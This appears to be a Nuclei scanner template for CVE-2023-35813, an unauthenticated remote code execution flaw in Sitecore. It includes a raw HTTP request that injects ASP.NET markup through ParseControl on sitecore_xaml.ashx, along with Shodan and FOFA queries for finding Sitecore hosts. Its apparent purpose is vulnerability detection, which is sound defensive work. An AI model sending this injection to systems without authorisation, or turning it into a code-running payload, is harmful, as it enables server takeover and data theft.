id: CVE-2023-35813

info:
  name: Sitecore - Remote Code Execution
  author: DhiyaneshDk,iamnoooob
  severity: critical
  description: |
    Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
  impact: |
    Unauthenticated attackers can execute arbitrary code on Sitecore servers through the XAML parser by injecting malicious ASP.NET markup, potentially compromising the entire content management system and accessing sensitive customer data.
  remediation: |
    Apply Sitecore security patches as outlined in KB1002979 for Experience Manager, Experience Platform, and Experience Commerce versions through 10.3.
  reference:
    - https://support.sitecore.com/kb?id=kb_article_view\u0026sysparm_article=KB1002979
    - https://code-white.com/blog/exploiting-asp.net-templateparser-part-1/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35813
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1002979
    - https://github.com/BagheeraAltered/CVE-2023-35813-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-35813
    cwe-id: CWE-22,CWE-23
    epss-score: 0.9358
    epss-percentile: 0.99843
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sitecore
    product: experience_commerce
    shodan-query:
      - title:"Sitecore"
      - http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve2023,cve,sitecore,rce,vkev,vuln
variables:
  string: "{{rand_base(6)}}"
  payload: |
    <%@Register
        TagPrefix = 'x'
        Namespace = 'System.Runtime.Remoting.Services'
        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
    %>
    <x:RemotingService runat='server'
        Context-Response-ContentType='{{string}}'
    />

http:
  - raw:
      - |
        POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("{{url_encode(payload)}}")

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, '{{string}}')
          - contains_all(body, 'commands', 'command', 'value')
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100d2257a3a606e87762d8556798c5706e33f7f9f5f1f4ea573db4abe992fb026570221008d14910e20e24abbcb93a25f44990335428b080e3741d84a515d41ee088edbcb:922c64590222798bb761d5b6d8e72950